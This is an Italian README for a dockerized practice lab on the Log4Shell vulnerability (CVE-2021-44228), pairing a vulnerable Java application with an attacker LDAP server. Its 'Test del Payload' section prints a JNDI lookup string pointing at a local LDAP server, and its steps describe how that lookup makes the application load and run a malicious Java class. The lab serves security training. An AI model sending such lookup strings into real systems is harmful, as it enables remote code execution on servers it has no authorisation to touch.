CVE-2021-44228 (Log4Shell) Vulnerability Lab Environment
Introduzione
Questo progetto fornisce un ambiente dockerizzato per esercitarsi in sicurezza e comprendere la critica vulnerabilità Log4j nota come CVE-2021-44228 (Log4Shell).
Caratteristiche Principali
- Ambiente di test dockerizzato sicuro
- Capacità di test personalizzato dei payload
- Include il server LDAP dell'attaccante e l'applicazione Java vulnerabile
Per Iniziare
docker compose up --build
Test del Payload
- Puoi modificare il payload nella sezione di test di
/vulnerable/Makefile
- Il payload predefinito utilizza
$${jndi:ldap://127.0.0.1:10000/}
Come Funziona
- L'applicazione Java vulnerabile si avvia
- Il server LDAP dell'attaccante è in ascolto sulla porta 10000
- L'applicazione vulnerabile viene eseguita
- Il payload Log4Shell viene registrato nell'applicazione vulnerabile tramite la sezione di test del Makefile
- L'applicazione vulnerabile tenta una ricerca JNDI LDAP
- Il server LDAP restituisce una classe Java malevola
- L'applicazione vulnerabile carica ed esegue questa classe